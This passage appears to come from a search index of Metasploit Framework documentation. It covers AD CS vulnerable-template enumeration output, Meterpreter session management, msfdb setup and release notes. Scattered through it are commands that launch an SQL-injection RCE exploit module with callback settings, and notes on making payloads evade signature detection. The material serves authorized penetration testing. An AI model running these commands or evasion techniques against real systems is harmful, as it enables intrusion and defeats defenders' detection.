    "content": "Windows Server 2022 with AD CS . msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run [*] Running module against 192.168.159.10 [*] Discovering base DN automatically [!] Couldn't find any vulnerable ESC13 templates! [+] Template: ESC1-Test [*] Distinguished Name: CN=ESC1-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC1 [*] Notes: ESC1: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-513 (Domain Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [+] Issuing CA: msflab-DC-CA (DC.msflab.local) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [+] Template: ESC2-Test [*] Distinguished Name: CN=ESC2-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC2 [*] Notes: ESC2: Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-513 (Domain Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [+] Issuing CA: msflab-DC-CA (DC.msflab.local) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [*] Auxiliary module execution completed . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#scenarios"
  },"540": {
    "doc": "Vulnerable cert finder",
    "title": "Vulnerable cert finder",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html"
  },"541": {
    "doc": "Loading Test Modules",
    "title": "Loading Test Modules",
    "content": "Metasploit offers inbuilt test modules which can be used for verifying that Metasploit’s post-exploitation modules work with currently opened sessions. These modules are intended to be used by developers to test updates to ensure they don’t break core functionality and should not be used during normal operations. These modules also run as part of the automated test suite within pull requests. By default the test modules in Metasploit are not loaded when Metasploit starts. To load them, run loadpath test/modules, after which you should see output similar to the following: . msf6 > loadpath test/modules Loaded 38 modules: 14 auxiliary modules 13 exploit modules 11 post modules msf6 > . The modules can be searched for: . msf6 > search post/test Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/test/cmd_exec . normal No Meterpreter cmd_exec test 1 post/test/railgun . normal No Railgun API Tests 2 post/test/extapi . normal No Test Meterpreter ExtAPI Stuff 3 post/test/get_env . normal No Test Post::Common Get Envs 4 post/test/services . normal No Test Post::Windows::Services 5 post/test/all . normal No Test all applicable post modules ... etc etc ... Example of running the test module against an opened session: . msf6 > use post/test/cmd_exec msf6 post(test/cmd_exec) > run session=-1 ... [*] Testing complete in 2.04 seconds [*] Passed: 6; Failed: 0; Skipped: 0 [*] Post module execution completed . The post/test/all module is an aggregate module that can be used to quickly run all of the applicable test modules against a currently open session: . 
msf6 post(test/all) > run session=-1 [*] Applicable modules: Valid modules for x86/windows session 1 ======================================= # Name is_session_platform is_session_type - ---- ------------------- --------------- 0 test/railgun_reverse_lookups Yes Yes 1 test/search Yes Yes 2 test/services Yes Yes 3 test/meterpreter Yes Yes 4 test/cmd_exec Yes Yes 5 test/extapi Yes Yes 6 test/file Yes Yes 7 test/get_env Yes Yes 8 test/railgun Yes Yes 9 test/registry Yes Yes 10 test/unix No Yes 11 test/mssql Yes No 12 test/mysql Yes No 13 test/postgres Yes No 14 test/smb Yes No [*] Running test/cmd_exec against session -1 [*] -------------------------------------------------------------------------------- ... etc etc ... [*] Running test/extapi against session -1 [*] -------------------------------------------------------------------------------- ... etc etc ... ",
    "url": "/docs/development/quality/loading-test-modules.html",
    "relUrl": "/docs/development/quality/loading-test-modules.html"
  },"542": {
    "doc": "Managing Sessions",
    "title": "Sessions Command",
    "content": "Session Search . When you have a number of sessions open, searching can be a useful tool to navigate them. This guide explains what capabilities are available for navigating open sessions with search. You can get a list of sessions matching specific criteria within msfconsole: . msf6 payload(windows/meterpreter/reverse_http) > sessions --search \"session_id:1 session_id:2\" Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN-ED9KFH65RDH\\Zach Goldman @WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132) . Currently, the only supported keywords for search are session_id, session_type, and last_checkin. These keywords can be combined to further filter your results, and used with other flags. For example: . msf6 payload(windows/meterpreter/reverse_http) > sessions --search \"session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s\" -v Active sessions =============== Session ID: 1 Name: Type: meterpreter windows Info: WIN-ED9KFH65RDH\\Zach Goldman @ WIN-ED9KFH65RDH Tunnel: 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132) Via: exploit/multi/handler Encrypted: Yes (AES-256-CBC) UUID: 958f7b976db67d60/x86=1/windows=1/2023-10-19T12:38:05Z CheckIn: 21725s ago @ 2023-10-19 09:26:08 -0500 Registered: No . Of note in the above example, last_checkin requires extra arguments. The second argument must be either greater_than or less_than. The third argument can be a sequence of alternating amounts and units of time (d: days, h: hours, m: minutes, and s: seconds), e.g. 5m2s, 10d, or 1d5m. Killing stale sessions . If --search is used in conjunction with --kill-all, it will restrict the latter function to only the search results. For example: . msf6 payload(windows/meterpreter/reverse_http) > sessions -K -S \"session_type:meterpreter\" [*] Killing matching sessions... 
Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN-ED9KFH65RDH\\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132) 2 meterpreter x86/windows WIN-ED9KFH65RDH\\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -> 192.168.2.132:52192 (192.168.2.132) [*] 192.168.2.132 - Meterpreter session 1 closed. [*] 192.168.2.132 - Meterpreter session 2 closed. msf6 payload(windows/meterpreter/reverse_http) > . ",
    "url": "/docs/using-metasploit/basics/managing-sessions.html#sessions-command",
    "relUrl": "/docs/using-metasploit/basics/managing-sessions.html#sessions-command"
  },"543": {
    "doc": "Managing Sessions",
    "title": "Managing Sessions",
    "content": " ",
    "url": "/docs/using-metasploit/basics/managing-sessions.html",
    "relUrl": "/docs/using-metasploit/basics/managing-sessions.html"
  },"544": {
    "doc": "Measuring Metasploit Performance",
    "title": "Measuring Metasploit Performance",
    "content": "Metasploit has inbuilt tooling for measuring the performance of commands and generating CPU/memory reports after msfconsole or msfvenom is closed. Measuring CPU/memory . You can measure CPU/memory usage when starting msfconsole/msfvenom with environment variables: . METASPLOIT_CPU_PROFILE=true ./msfconsole -x 'exit' METASPLOIT_MEMORY_PROFILE=true ./msfconsole -x 'exit' . Granular CPU/memory performance can be recorded using Ruby blocks: . Metasploit::Framework::Profiler.record_cpu do # ... end . Metasploit::Framework::Profiler.record_memory do # ... end . In both scenarios, reports will be generated and written to disk that can be opened in a file editor/browser. Measuring command performance . The time command in msfconsole can be used to record the performance of a command: . msf6 exploit(windows/smb/ms17_010_psexec) > time reload [*] Reloading module... [+] Command \"reload\" completed in 0.20876399998087436 seconds . It is possible to record CPU and memory usage with the --memory and --cpu flags: . msf6 exploit(windows/smb/ms17_010_psexec) > time --cpu search smb ... etc ... Generating CPU dump /var/folders/wp/fp12h8q13kq7mvf4mll72c140000gq/T/msf-profile-2023030711505620230307-77101-4josw1/cpu [+] Command \"search smb\" completed in 0.4150249999947846 seconds . Examples: . time time -h time --help time search smb time --memory search smb time --cpu search smb . ",
    "url": "/docs/development/quality/measuring-metasploit-performance.html",
    "relUrl": "/docs/development/quality/measuring-metasploit-performance.html"
  },"545": {
    "doc": "Merging Metasploit Payload Gem Updates",
    "title": "Merging Metasploit Payload Gem Updates",
    "content": "When a new merge appears in the master branch of Metasploit Payloads, a new Ruby gem is built and automatically pushed up to RubyGems. This new version needs to be merged into the Metasploit Framework repository for those changes to be included. To do this, committers must: . | Create a new branch in the Metasploit Framework repository. | Name it something useful like metasploit-payloads-<version>. | Modify metasploit-framework.gemspec so that the new version number is specified for the metasploit-payloads gem. | Run bundle install. | Remove any test/development binaries from data/meterpreter. | Run tools/modules/update_payload_cached_sizes.rb. | Make sure that Gemfile.lock only contains changes that are related to Metasploit Payloads. | Stage the following for commit in git: . | Gemfile.lock | metasploit-framework.gemspec | Any payload modules that have had an updated payload size (usually this includes stageless payloads only) | . | Commit the staged files. | Push the branch to GitHub. | Create the Pull Request. | . Done! . A sample update PR/commit can be found here: https://github.com/rapid7/metasploit-framework/pull/7666/files . ",
    "url": "/docs/development/maintainers/ruby-gems/merging-metasploit-payload-gem-updates.html",
    "relUrl": "/docs/development/maintainers/ruby-gems/merging-metasploit-payload-gem-updates.html"
  },"546": {
    "doc": "Metasploit Framework 5.0 Release Notes",
    "title": "Get Metasploit 5.0",
    "content": "You can get Metasploit 5.0 by checking out the 5.0.0 tag in the Metasploit GitHub project. Need a primer on Framework architecture and usage? Take a look at our wiki here, and feel free to reach out to the broader community on Slack. There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can’t find something you want in our wiki, ask Google or the community what they recommend. See all the ways to stay informed and get involved at https://metasploit.com. ",
    "url": "/docs/development/roadmap/metasploit-5-release-notes.html#get-metasploit-50",
    "relUrl": "/docs/development/roadmap/metasploit-5-release-notes.html#get-metasploit-50"
  },"547": {
    "doc": "Metasploit Framework 5.0 Release Notes",
    "title": "Metasploit Framework 5.0 Release Notes",
    "content": "Metasploit Framework 5.0 has released! . Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use. See the release announcement here. The following is a high-level overview of Metasploit 5.0’s features and capabilities. | Metasploit users can now run the PostgreSQL database by itself as a RESTful service, which allows for multiple Metasploit consoles and external tools to interact with it. | Parallel processing of the database and regular msfconsole operations improves performance by offloading some bulk operations to the database service. | A JSON-RPC API enables users to integrate Metasploit with additional tools and languages. | This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services here. | Adds evasion module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules here. Rapid7’s first evasion modules are here. | The metashell feature allows users to run background sessions and interact with shell sessions without needing to upgrade to a Meterpreter session. | External modules add Metasploit support for Python and Go in addition to Ruby. | Any module can target multiple hosts by setting RHOSTS to a range of IPs, or by referencing a hosts file with the file:// option. Metasploit now treats RHOST and RHOSTS as identical options. | An updated search mechanism improves Framework start time and removes database dependency. | . ",
    "url": "/docs/development/roadmap/metasploit-5-release-notes.html",
    "relUrl": "/docs/development/roadmap/metasploit-5-release-notes.html"
  },"548": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Payload Improvements",
    "content": "Quite a few payload improvements have been made; most, but not all, have been for the Meterpreter payload and its various implementations. Among other things, it was updated to support AES encryption in CBC mode in all implementations on all transports. This helps to secure framework users’ data in transit. Now any files transferred, commands issued, etc. are encrypted on the network using AES and a key negotiated via RSA. This helps remove static strings from network traffic, but it’s not the only change targeting obfuscation. Each of the Meterpreter commands was replaced with an integer equivalent, thus removing conspicuous values such as stdapi_fs_file_copy, core_migrate and mimikatz_custom_command. Additionally, the payload binaries were updated to utilize functions by ordinal value rather than by name. This allows them to be called without disclosing their own conspicuous values such as ReflectiveLoader, ext_server_, etc. Lastly, the static “Block API” used by almost all x86 and x64 Windows shellcode payloads was updated to be polymorphic, causing it to be randomized on each invocation. In some payloads, the Block API accounts for as much as half of the shellcode and was an easy target for signature-based detection. All of these changes mark strides towards complicating the identification of key artifacts generated by Metasploit via static analysis, i.e. signatures. Compatibility Changes . Metasploit 6 drops Meterpreter support for Windows versions older than XP SP2. This service pack adds a number of API methods that are required by Meterpreter and backporting compatibility is not a priority at this time. The Meterpreter stage will fail to load on these older, unsupported versions. This results in a message saying that the session was closed. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#payload-improvements",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#payload-improvements"
  },"549": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "SMB 3",
    "content": "Metasploit 6 adds support for SMB client connections using the version 3 dialects. This adds compatibility for a large pool of modules to work in environments where SMB version 1 and 2 have been disabled. Additionally, one of the most notable improvements of the version 3 dialects is encryption support, which when negotiated allows the framework to secure its connections to compatible SMB servers. SMB version 3, which was added in Windows 8 and Server 2012, incorporates a few security improvements, leading many organizations to migrate towards its exclusive use within their environments. While many modules were updated to use the RubySMB SMB 3 implementation, not all were updated. Notably, many older exploits that pre-date the release of SMB 3 were not updated and continue to use the original Rex implementation of the protocol. For those modules that have been updated, however, users will be able to use them without any changes to their workflow. By default the newest dialect will be negotiated with the remote server, and if it is one of the dialects within version 3 that supports encryption, the framework will use encryption by default. Users can alter this behavior by setting the SMB::AlwaysEncrypt and SMB::ProtocolVersion options. SMB::AlwaysEncrypt enforces encryption for SMB 3 connections even when the server does not require it (defaults to: true), while SMB::ProtocolVersion is a comma separated list of versions to allow the framework to negotiate (default: 1,2,3). Module authors looking to write SMB modules should note the move towards the RubySMB protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the mixins; however, some edge-case functionality must still be ported over to RubySMB. For information on writing modules that target SMB for Metasploit, see Guidelines for Writing Modules with SMB. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#smb-3",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#smb-3"
  },"550": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Pull Requests",
    "content": "A complete list of pull requests included as part of the initial version 6 work: . | Payload Improvements . | Add AES TLV encryption support: Java, Python . | Support AES-128-CBC as an additional option: Framework Core, Java | Change from PEM to DER for crypt TLV negotiation: Windows, Java, PHP, Framework Core, mettle, Python | . | Remove DLL exports from Meterpreter: Windows Framework Core, ReflectiveDLLInjection | Replace METHOD string with COMMAND_ID integer (to remove obvious strings): Framework Core, Windows, Java, PHP, Python | Cross-compile Windows binaries on Linux . | Various changes required for cross compilation | Update readme for cross compilation | . | Remove the old Mimikatz extension: Windows, Framework Core | Polymorphic x86/x64 Block API | . | Add SMBv3 support: ruby_smb, Framework Core . | Fixes and improvements from MSF code review | Store server system and start time values | . | Add a command target to the PSexec module | . ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#pull-requests",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#pull-requests"
  },"551": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Get Metasploit 6.0",
    "content": "You can get Metasploit 6.0 by checking out the 6.0.0 tag in the Metasploit GitHub project. Need a primer on Framework architecture and usage? Take a look at our wiki here, and feel free to reach out to the broader community on Slack. There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can’t find something you want in our wiki, ask Google or the community what they recommend. See all the ways to stay informed and get involved at https://metasploit.com. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#get-metasploit-60",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#get-metasploit-60"
  },"552": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Metasploit Framework 6.0 Release Notes",
    "content": "Metasploit Framework 6.0 is in progress! . Metasploit 6.0 adds a number of features and promotes a theme of being “secure by default”. See the initial release announcement here. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html"
  },"553": {
    "doc": "Metasploit Breaking Changes",
    "title": "Metasploit Breaking Changes",
    "content": "Occasionally, we have ideas or submissions that are absolutely awesome, but that require us to completely change how Metasploit does something, so the deployment of the feature must be done carefully. In Metasploit 6, it was the way we enumerated commands to the Meterpreter payloads and how we implemented crypto (as in cryptography) between framework and payloads. In an effort to chart these breaking changes, there is a github label for “Breaking Change” and we can use this space to talk about them as well. ",
    "url": "/docs/development/roadmap/metasploit-breaking-changes.html",
    "relUrl": "/docs/development/roadmap/metasploit-breaking-changes.html"
  },"554": {
    "doc": "Metasploit Data Service",
    "title": "Rationale",
    "content": "The current data storage mechanism couples the Metasploit core framework code to the current data storage technology. This coupling causes inflexibility, which is reflected in the following problems: . | Changes to the current data model are complex | The ability to support/use different data storage technologies is difficult | Promotes a monolithic architecture where poor performance in any segment of the software affects the entire system (large network scans) | . Our solution to this is a data service proxy. A data service proxy allows us to separate core Metasploit Framework code from the underlying data service technology. The framework.db reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation. Currently we plan to support the legacy data storage technology stack (Rails/PostgreSQL), which we hope to eventually phase out. The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to framework.db can be proxied to a remote web service that supports the same data service API. We have built a web service that runs atop the current data storage service for the community. This approach enables us to: . | More easily enhance the Metasploit data model | Run a web-based data service independent of the Metasploit Framework . | Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client | Increases throughput as storage calls don’t necessarily need to be asynchronous | Allows teams to collaborate easily by connecting to a centralized data service | . | Quickly build out data services that leverage different technology stacks | Isolate component testing | Users of Metasploit can now leverage a rigid API to build other tools easily (documentation to be provided soon) | . ",
    "url": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#rationale",
    "relUrl": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#rationale"
  },"555": {
    "doc": "Metasploit Data Service",
    "title": "Usage",
    "content": "For more information on setting up the web service and using the data services see Metasploit Web Service. ",
    "url": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#usage",
    "relUrl": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#usage"
  },"556": {
    "doc": "Metasploit Data Service",
    "title": "Metasploit Data Service",
    "content": "Project Goliath came about primarily around the need to enhance the current data service and data models to increase the value of data in Metasploit to our end users. This work is currently being done in 2 stages: . Stage 1 . This is currently a work in progress (which is why Goliath is currently not fully functional). The work being done or already done includes: . | Port of the current data models to be used over HTTP / HTTPS | Creation of a web service that serves the Metasploit data model | Creation of a new command in Metasploit to connect to remote (web based) data services | Creation of a Metasploit Data Service API V1 document | . Stage 2 . | Enhance the current data model | Creation of a Metasploit Data Service API V2 document. Potential changes include (feel free to submit ideas): . | Creation of a generic data type (for when you can’t figure out which data type a piece of data belongs to) | . | . ",
    "url": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html",
    "relUrl": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html"
  },"557": {
    "doc": "Database Support",
    "title": "What is msfdb?",
    "content": "msfdb is a script included with all installations of Metasploit that allows you to easily set up and control both a database and a Web Service capable of connecting this database with Metasploit. While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found here. ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#what-is-msfdb",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#what-is-msfdb"
  },"558": {
    "doc": "Database Support",
    "title": "Why should I use msfdb?",
    "content": "It’s not mandatory to use a database with Metasploit; it can run perfectly fine without one. However, a lot of the features that make Metasploit so great require a database, and msfdb is the simplest way to set up a Metasploit compatible database. The Metasploit features that require a connected database include: . | Recording other machines on a network that are found with an nmap scan via the db_nmap command; these are stored as “Hosts”. | Hosts can be viewed with the hosts command | . | Storing credentials successfully extracted by exploits; these are stored as “creds”. | Credentials are viewed with the creds command. | . | Keeping track of successful exploitation attempts; these are recorded as “Vulnerabilities”. | Successful exploitations can be viewed with the vulns command. | The vulns command also tracks unsuccessful exploitation attempts | . | Storing services detected on remote hosts by db_nmap; these are recorded as “Services” . | Remote services are viewed with the services command | . | Tracking multiple remote sessions opened by exploit payloads . | These sessions can be managed and tracked with the sessions command. | . | Storing any difficult to define information returned by successful exploits as “Loot” . | Viewable with the loot command | . | Keeping track of “Ping back payloads”, a non-interactive payload type that provides users with confirmation of remote execution on a target | Pivoting through a network with “Routes” comprised of active sessions . | Viewable with the routes command | . | Building reports comprising all of the above information (Restricted to Pro users) | . All of the above features can also be logically separated within workspaces. By using the workspace command, you can place the results of certain operations in different workspaces. This helps keep any data generated or recorded during your use of Metasploit organized and easy to follow. ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#why-should-i-use-msfdb",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#why-should-i-use-msfdb"
  },"559": {
    "doc": "Database Support",
    "title": "Using msfdb",
    "content": "Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run ./msfdb init . Creating database at /Users/your_current_account_name/.msf4/db Starting database at /Users/your_current_account_name/.msf4/db...success Creating database users Writing client authentication configuration file /Users/your_current_account_name/.msf4/db/pg_hba.conf Starting database at /Users/your_current_account_name/.msf4/db...success Creating initial database schema . This looks like a lot of information, but all it’s saying is that it’s creating the database Metasploit will use to store information. If you start up msfconsole now it should automatically connect to the database, and if you run db_status you should see something like this: . msf6 &amp;gt; db_status [*] Connected to msf. Connection type: postgresql. You can also setup a Web Service, which Metasploit can use to connect to the database you have just created. Msfdb needs to establish the credentials that are used in the Web Service. If you run msfdb --component webservice init the first prompt asks you what username you want to use to connect to the database: . [?] Initial MSF web service account username? [your_current_account_name]: . Then the password used to authenticate to the Web Service: . [?] Initial MSF web service account password? (Leave blank for random password): . Hitting enter for both these prompts will setup up the Web Service correctly. You can change these defaults and use a specific username and password if you want, but it’s not necessary. After these two prompts are dealt with, your Web Service will start! . 
Generating SSL key and certificate for MSF web service Attempting to start MSF web service...success MSF web service started and online Creating MSF web service user your_current_account_name ############################################################ ## MSF Web Service Credentials ## ## ## ## Please store these credentials securely. ## ## You will need them to connect to the webservice. ## ############################################################ MSF web service username: your_current_account_name MSF web service password: super_secret_password MSF web service user API token: super_secret_api_token MSF web service configuration complete The web service has been configured as your default data service in msfconsole with the name \"local-https-data-service\" If needed, manually reconnect to the data service in msfconsole using the command: db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443 The username and password are credentials for the API account: https://localhost:5443/api/v1/auth/account . Again, this is a lot of information to process, but it’s not nearly as complicated as it looks. The username, password, and API token used to connect to the Web Service are displayed: . MSF web service username: your_current_account_name MSF web service password: super_secret_password MSF web service user API token: super_secret_api_token . Followed by instructions on how to connect to your database with Metasploit via the Web Service: . If needed, manually reconnect to the data service in msfconsole using the command: db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443 . And the URL you can visit with your browser in order to connect to the Web Service. This is useful for checking if the Web Service is running: . 
The username and password are credentials for the API account: https://localhost:5443/api/v1/auth/account . All this information is loaded by Metasploit automatically at startup from the ~/.msf4 folder. You should copy the credentials to a file in case you need them in the future. If you forget or lose the credentials, you can always run ./msfdb reinit to reset the Web Service authentication details. Just make sure to say no to the prompt asking you if you want to delete the Database contents! . ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#using-msfdb",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#using-msfdb"
  },"560": {
    "doc": "Database Support",
    "title": "msfdb commands",
    "content": "The commands for msfdb are as follows: . | ./msfdb init Creates and begins execution of a database &amp;amp; web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice. | ./msfdb delete Deletes the web service and database configuration files. You will also be prompted to delete the database’s contents, but this is not mandatory. | ./msfdb reinit The same as running ./msfdb delete followed immediately by ./msfdb init. | ./msfdb status Displays if the database &amp;amp; web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed. | ./msfdb start Start the database &amp;amp; web service. | ./msfdb stop Stop the database &amp;amp; web service. | ./msfdb restart The same as running ./msfdb stop followed immediately by ./msfdb start. | . ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-commands",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-commands"
  },"561": {
    "doc": "Database Support",
    "title": "msfdb errors",
    "content": "In the case of any of the above commands printing either a stack trace or error, your first step should be to run ./msfdb reinit (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an error ticket. ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-errors",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-errors"
  },"562": {
    "doc": "Database Support",
    "title": "What’s next?",
    "content": "That’s it for the simple high level explanation of how to setup a database for metasploit. If that wasn’t enough detail for you you can check out our more in depth explanation here. If you want to get started hacking but don’t know how to, here are a few guides we really like: . | The easiest metasploit guide you’ll ever read - A great, easy to follow guide on how to set up Metasploit and Metasploitable (Our intentionally vulnerable Linux virtual machine used to for security training) for VMs. Also has a fantastic guide on penetration testing Metasploitable 2, from information gathering right up to exploitation. | Offensive Security: Metasploit Unleashed - Still dealing with Metasploitable 2, this guide covers similar content as the The easiest metasploit guide you’ll ever read, but with much more detail. | . However, if you’re confident in your knowledge of Metasploit and just want to get stuck in, then get stuck in! Good luck, be nice and have fun. ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#whats-next",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#whats-next"
  },"563": {
    "doc": "Database Support",
    "title": "Database Support",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html"
  },"564": {
    "doc": "Metasploit Framework Wish List",
    "title": "Always useful",
    "content": ". | If you’re unfamiliar with Metasploit or looking to tackle some smaller projects, we’ll thank you a million times over to look at our issue queue. Submitting bug fixes, testing reported issues, and answering questions are all extremely helpful. | See an issue whose submitter didn’t give us much information about replication, their target environment, or their version of Metasploit? See if you can get some clarity to help out, or better yet, test it yourself! | You can also sort out feature requests in our issue queue. See something that sounds cool? Fantastic! Tinker away and submit a PR. | Write docs! Adding documentation is one of the best ways to help current and future users (especially beginners) and save developers pain. | Check out PRs in the attic and see if you can pick up where another contributor left off or got stuck. | . ",
    "url": "/docs/development/roadmap/metasploit-framework-wish-list.html#always-useful",
    "relUrl": "/docs/development/roadmap/metasploit-framework-wish-list.html#always-useful"
  },"565": {
    "doc": "Metasploit Framework Wish List",
    "title": "A few other ideas",
    "content": ". | Implement transport switching for Mettle. | Improve network evasions across multiple protocols. Client headers abound with telltales! | Add UPnP recon and fuzzing library support (there’s a fun thread on this idea here) | . ",
    "url": "/docs/development/roadmap/metasploit-framework-wish-list.html#a-few-other-ideas",
    "relUrl": "/docs/development/roadmap/metasploit-framework-wish-list.html#a-few-other-ideas"
  },"566": {
    "doc": "Metasploit Framework Wish List",
    "title": "Metasploit Framework Wish List",
    "content": "We are frequently asked what would be useful as a contribution to the project. There’s evergreen advice below, as well as a few more specific wish list ideas from our team. ",
    "url": "/docs/development/roadmap/metasploit-framework-wish-list.html",
    "relUrl": "/docs/development/roadmap/metasploit-framework-wish-list.html"
  },"567": {
    "doc": "HTTP + HTTPS",
    "title": "HTTP Workflows",
    "content": "HTTP (Hypertext Transfer Protocol), is an application-level protocol for distributed, collaborative, hypermedia information systems. There are two main ports: . | 80/TCP - HTTP | 443/TCP - HTTPS (Hypertext Transport Protocol Secure) - encrypted using Transport Layer Security or, formerly, Secure Sockets Layer | . Note that any port can be used to run an application which communicates via HTTP/HTTPS. This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance: . msf6 &amp;gt; search tomcat http . HTTP Examples . Auxiliary modules: . use auxiliary/scanner/http/title run https://example.com . Specifying credentials and payload information: . use exploit/unix/http/cacti_filter_sqli_rce run http://admin:[email protected]/cacti/ lhost=tun0 lport=4444 run 'http://admin:pass with [email protected]/cacti/' lhost=tun0 lport=4444 . Specifying alternative ports: . run http://192.168.123.6:9001 . HTTP Debugging . You can log all HTTP requests and responses to the Metasploit console with the HttpTrace option, as well as enable additional verbose logging: . use auxiliary/scanner/http/title run http://example.com HttpTrace=true verbose=true . For instance: . 
